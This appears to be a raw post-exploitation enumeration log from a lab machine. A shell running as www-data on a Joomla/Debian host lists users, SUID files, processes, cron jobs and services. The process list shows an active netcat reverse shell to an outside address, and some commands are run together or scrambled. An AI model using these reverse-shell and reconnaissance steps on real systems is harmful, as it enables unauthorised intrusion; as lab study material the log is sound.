System/Kernel
www-data@glasgowsmile:/var/www/html/joomla$ uname -a ; cat /etc/*release
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"4.19.0-9-amd64x86_64Debian GNU/Linux 10 (buster)
Networks
www-data@glasgowsmile:/var/www/html/joomla$ ip route ; arp -a
default via 192.168.210.254 dev ens160 onlink
192.168.210.0/24 dev ens160 proto kernel scope link src 192.168.210.79
? (192.168.210.254) at 00:50:56:9e:65:67 [ether] on ens160www-data@glasgowsmile:/var/www/html/joomla$ netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.210.79:43090 192.168.45.182:9999 ESTABLISHED 1901/sh
tcp 0 16 192.168.210.79:43066 192.168.45.182:9999 ESTABLISHED 1778/sh
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 1 0 192.168.210.79:80 192.168.45.182:39320 CLOSE_WAIT -
tcp6 1 0 192.168.210.79:80 192.168.45.182:48122 CLOSE_WAIT - 127.0.0.1:3306
Users & Groups
www-data@glasgowsmile:/var/www/html/joomla$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
rob:x:1000:1000:rob,,,:/home/rob:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
abner:x:1001:1001:Abner,,,:/home/abner:/bin/bash
penguin:x:1002:1002:Penguin,,,:/home/penguin:/bin/bash
total 20K
4.0K drwxr-xr-x 4 penguin penguin 4.0K Aug 25 2020 penguin
4.0K drwxr-xr-x 3 abner abner 4.0K Aug 25 2020 abner
4.0K drwxr-xr-x 2 rob rob 4.0K Aug 25 2020 rob
4.0K drwxr-xr-x 18 root root 4.0K Jul 1 2020 ..
4.0K drwxr-xr-x 5 root root 4.0K Jun 15 2020 .robabnerpenguin
www-data@glasgowsmile:/var/www/html/joomla$ idt -d: -f1 /etc/passwd | xargs -n1 i
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(mysql) gid=113(mysql) groups=113(mysql)
uid=1001(abner) gid=1001(abner) groups=1001(abner)
uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)uid=1001(abner) gid=1001(abner) groups=1001(abner)uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)
SUIDs
www-data@glasgowsmile:/var/www/html/joomla$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
922732 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
1050898 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
798657 20 -rwsr-xr-x 1 root root 18888 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
922709 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
799266 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
790323 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
786470 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
789851 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
789998 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
798654 24 -rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec
786468 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
786471 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
790325 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
786467 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfnSGIDs
www-data@glasgowsmile:/var/www/html/joomla$ find / -perm -02000 -ls -type f 2>/dev/null | grep -v '/snap'
262368 4 drwxrwsr-x 2 root mail 4096 Jun 13 2020 /var/mail
262322 4 drwxrwsr-x 2 root staff 4096 May 2 2020 /var/local
264737 4 drwxr-s--- 2 mysql adm 4096 Jun 25 09:44 /var/log/mysql
11168 0 drwxr-sr-x 3 root systemd-journal 60 Aug 2 2024 /run/log/journal
11169 0 drwxr-s--- 2 root systemd-journal 100 Jun 25 09:44 /run/log/journal/ea7f18350f694106abff7f69287128cf
794635 4 drwxrwsr-x 4 root staff 4096 Jun 13 2020 /usr/local/lib/python2.7
923443 4 drwxrwsr-x 2 root staff 4096 Jun 13 2020 /usr/local/lib/python2.7/site-packages
920748 4 drwxrwsr-x 2 root staff 4096 Jun 13 2020 /usr/local/lib/python2.7/dist-packages
793038 4 drwxrwsr-x 3 root staff 4096 Jun 13 2020 /usr/local/lib/python3.7
793039 4 drwxrwsr-x 2 root staff 4096 Jun 13 2020 /usr/local/lib/python3.7/dist-packages
926265 4 drwxrwsr-x 2 root staff 4096 Jun 13 2020 /usr/local/share/fonts
787272 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
795836 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
791725 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
791665 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
795547 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
786466 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
787896 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
786469 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiryCapabilities
www-data@glasgowsmile:/var/www/html/joomla$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+epProcesses
www-data@glasgowsmile:/var/www/html/joomla$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 1.0 169488 10184 ? Ss 09:42 0:00 /sbin/init
root 260 0.0 0.8 40416 8272 ? Ss 09:42 0:00 /lib/systemd/systemd-journald
root 277 0.0 0.4 22060 5044 ? Ss 09:42 0:00 /lib/systemd/systemd-udevd
root 429 0.0 1.0 48220 10564 ? Ss 09:42 0:00 /usr/bin/VGAuthService
root 430 0.0 1.2 122880 12256 ? Ssl 09:42 0:02 /usr/bin/vmtoolsd
systemd+ 431 0.0 0.8 93080 8536 ? Ssl 09:42 0:00 /lib/systemd/systemd-timesyncd
root 435 0.0 0.6 19304 6404 ? Ss 09:42 0:00 /lib/systemd/systemd-logind
message+ 436 0.0 0.4 9100 4432 ? Ss 09:42 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 438 0.0 0.4 225824 4364 ? Ssl 09:42 0:00 /usr/sbin/rsyslogd -n -iNONE
root 439 0.0 0.2 8504 2884 ? Ss 09:42 0:00 /usr/sbin/cron -f
root 459 0.0 0.1 5612 1744 tty1 Ss+ 09:42 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 462 0.0 0.6 15852 6676 ? Ss 09:42 0:00 /usr/sbin/sshd -D
mysql 557 0.0 10.7 1258828 108252 ? Ssl 09:42 0:05 /usr/sbin/mysqld
root 572 0.0 3.0 231520 31024 ? Ss 09:42 0:00 /usr/sbin/apache2 -k start
www-data 1379 0.0 3.4 309632 34472 ? S 10:00 0:02 /usr/sbin/apache2 -k start
www-data 1778 0.0 0.0 2388 760 ? S 11:03 0:00 sh -c bash
www-data 1779 0.0 0.2 3736 2852 ? S 11:03 0:00 bash
www-data 1900 0.0 0.0 2388 756 ? S 11:16 0:00 sh -c nc 192.168.45.182 9999 -c bash
www-data 1901 0.0 0.0 2388 760 ? S 11:16 0:00 sh -c bash
www-data 1902 0.0 0.2 3736 2864 ? S 11:16 0:00 bash
www-data 1920 0.0 0.1 2592 1940 ? S 11:19 0:00 script /dev/null -c bash
www-data 1921 0.0 0.0 2388 752 pts/0 Ss 11:19 0:00 sh -c bash
www-data 1922 0.0 0.3 3868 3248 pts/0 S+ 11:19 0:00 bash
www-data 1923 0.0 0.1 2592 1808 ? S 11:19 0:00 script /dev/null -c bash
www-data 1924 0.0 0.0 2388 700 pts/1 Ss 11:19 0:00 sh -c bash
www-data 1925 0.0 0.3 3992 3224 pts/1 S 11:19 0:00 bash
www-data 1997 0.0 0.2 7924 2856 pts/1 R+ 11:22 0:00 ps -auxwwwroot 439 0.0 0.2 8504 2884 ? Ss 09:42 0:00 /usr/sbin/cron -fmysql 557 0.0 10.7 1258828 108252 ? Ssl 09:42 0:05 /usr/sbin/mysqld
Cron & Systemd
www-data@glasgowsmile:/var/www/html/joomla$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED
Wed 2025-06-25 11:39:00 CDT 15min left Wed 2025-06-25 11:09:01 CDT 14min ago
Thu 2025-06-26 00:00:00 CDT 12h left Wed 2025-06-25 09:44:42 CDT 1h 38min ag
Thu 2025-06-26 00:00:00 CDT 12h left Wed 2025-06-25 09:44:42 CDT 1h 38min ag
Thu 2025-06-26 02:24:25 CDT 15h left Wed 2025-06-25 09:44:42 CDT 1h 38min ag
Thu 2025-06-26 06:09:23 CDT 18h left Wed 2025-06-25 09:44:42 CDT 1h 38min ag
Thu 2025-06-26 09:57:27 CDT 22h left Wed 2025-06-25 09:57:27 CDT 1h 25min ag
6 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@glasgowsmile:/var/www/html/joomla$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope loaded active running System and Service Manage
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background progra
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
mariadb.service loaded active running MariaDB 10.3.22 database
open-vm-tools.service loaded active running Service for virtual machi
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell serv
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronizat
systemd-udevd.service loaded active running udev Kernel Device Manage
vgauth.service loaded active running Authentication service fo
dbus.socket loaded active running D-Bus System Message Bus
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
22 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.apache2.servicecron.servicemariadb.service
Sudo Version
www-data@glasgowsmile:/var/www/html/joomla$ /sbin/sudo --version
bash: /sbin/sudo: No such file or directory
www-data@glasgowsmile:/var/www/html/joomla$ /bin/sudo --version
bash: /bin/sudo: No such file or directoryGlibc Version
www-data@glasgowsmile:/var/www/html/joomla$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.28-10) 2.28